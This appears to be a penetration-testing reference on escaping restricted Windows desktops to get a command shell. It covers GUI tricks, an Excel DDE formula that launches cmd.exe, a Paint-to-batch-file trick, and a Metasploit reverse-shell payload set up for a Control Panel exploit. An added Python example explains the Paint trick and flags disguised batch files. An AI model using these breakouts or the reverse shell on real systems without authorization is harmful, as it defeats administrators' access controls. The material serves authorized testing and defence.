# Windows utilities

Credit: <https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/>

## Notepad

Create a new text file, save it as `file.bat` with the content `cmd.exe`, then double-click the file: a cmd window opens.

## Cortana

McAfee uncovered and documented the security flaws in a lengthy blog post. One simple issue was that the voice assistant could be triggered from the lock screen (assuming Cortana is enabled there, which it is on default settings), and simply typing while Cortana is listening to a query on a locked device brings up a Windows 10 contextual menu, as shown below:

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FsajbiwtRLNGq4iTSQzZL%2Ffile.png?alt=media)

## Task Scheduler

An interesting weakness: some systems prevent direct access to cmd.exe, yet it can still be scheduled to run via Task Scheduler, either from the command-line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (e.g. 1 minute in the future) or on certain events, such as when a user logs on.

We can also use it to run PowerShell from the path:

`%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe`

triggered when the user logs out and back in.

## Task Manager

Task Manager: CTRL+SHIFT+ESC -> File -> Run New Task

## Printer

Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe

## Internet Explorer

Get a cmd shell in Internet Explorer:

### Address Bar

Enter in the address bar:

`file://C:\Windows\System32\cmd.exe`

### Developer Tools

Developer Tools: Press F12 -> Performance Tab -> Press on 3rd icon "Importing Profile Session"

## Excel

Get a cmd.exe shell using Excel:

Place this in a cell and press Enter:

`=cmd|' /k cmd.exe'!'A1'`

## Windows Search

Get a cmd.exe or PowerShell shell using Windows Search:

Press the Windows key and type the program name into the search box. Note that admins frequently block cmd.exe and PowerShell but forget to block PowerShell ISE.

## Shortcuts

Try shortcuts:

- Shift pressed 5 times = Sticky Keys
- Alt + F4 = shut down computer
- Win + R = Run dialog
- Ctrl + Shift + Esc = Task Manager
- Ctrl + Alt + Delete = help menu (Task Manager, change password, etc.)

## Control Panel

Generating a simple x64 reverse shell in .cpl format with the Metasploit module:

```
use windows/local/cve_2017_8464_lnk_lpe
set payload windows/x64/shell_reverse_tcp
```

Invoking the shellcode via control.exe:

`control.exe .\FlashPlayerCPLApp.cpl`

or

`rundll32.exe shell32.dll,Control_RunDLL file.cpl`

or

`rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl`

## Paint

An unusual yet effective method of gaining a shell: create a shortcut to cmd.exe by drawing specific colours in Microsoft Paint. Because a 24-bit BMP stores each pixel's colour channels as raw bytes, carefully chosen RGB values dictate the ASCII data written into the file.

![IMAGE12](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FweaIqzuH98wwPceSPQmO%2Ffile.jpeg?alt=media)

Open MSPaint.exe and set the canvas size to Width=6 and Height=1 pixels.

Zoom in to make the following steps easier.

Using the colour picker, set the pixel values to (from left to right):

```
1st: R: 10, G: 0, B: 0 
2nd: R: 13, G: 10, B: 13 
3rd: R: 100, G: 109, B: 99 
4th: R: 120, G: 101, B: 46 
5th: R: 0, G: 0, B: 101 
6th: R: 0, G: 0, B: 0 
```

Save it as a 24-bit Bitmap (\*.bmp;\*.dib).

Change its extension from .bmp to .bat and run it.
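As an added example (not part of the original post), the following Python reproduces the 24-bit BMP row encoding to show why the six pixel values above spell out `cmd.exe`, and adds a defensive check that flags a `.bat`/`.cmd` file beginning with the BMP magic bytes. The BMP bytes are constructed inline as sample data, and the helper names are the example's own.

```python
import struct

# Pixel values from the Paint walkthrough above, left to right, as (R, G, B).
PAINT_PIXELS = [(10, 0, 0), (13, 10, 13), (100, 109, 99),
                (120, 101, 46), (0, 0, 101), (0, 0, 0)]

def bmp_row_bytes(pixels):
    """Encode one scanline the way a 24-bit BMP does: each pixel is written
    as B, G, R (not R, G, B) and the row is zero-padded to a 4-byte boundary.
    Rows are also stored bottom-up, which does not matter for a single row."""
    row = b"".join(bytes((b, g, r)) for r, g, b in pixels)
    row += b"\x00" * (-len(row) % 4)
    return row

def build_bmp(pixels):
    """Assemble a minimal single-row 24-bit BMP (constructed sample data):
    14-byte file header, 40-byte BITMAPINFOHEADER, then the pixel row."""
    row = bmp_row_bytes(pixels)
    offset = 14 + 40
    file_header = struct.pack("<2sIHHI", b"BM", offset + len(row), 0, 0, offset)
    info_header = struct.pack("<IiiHHIIiiII", 40, len(pixels), 1, 1, 24,
                              0, len(row), 0, 0, 0, 0)
    return file_header + info_header + row

def printable_runs(data, min_len=4):
    """Return runs of printable ASCII of at least min_len bytes, like the
    Unix `strings` tool; shows what text an analyst would see in the file."""
    runs, current = [], bytearray()
    for byte in data + b"\x00":          # sentinel flushes the final run
        if 0x20 <= byte < 0x7F:
            current.append(byte)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    return runs

def is_bmp_disguised_as_batch(filename, data):
    """Defensive check: a .bat/.cmd whose content starts with the BMP magic
    'BM' is an image renamed to a script, which cmd.exe will still execute."""
    return filename.lower().endswith((".bat", ".cmd")) and data[:2] == b"BM"

if __name__ == "__main__":
    sample = build_bmp(PAINT_PIXELS)
    print(bmp_row_bytes(PAINT_PIXELS))  # b'\x00\x00\n\r\n\rcmd.exe' + 7 nulls
    print(printable_runs(sample))  # ['cmd.exe']
    print(is_bmp_disguised_as_batch("file.bat", sample))  # True
```

The header bytes land in the batch file as a garbage first line, and the row's `\r\n` bytes then start a fresh line containing `cmd.exe`, which is why the renamed image runs.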
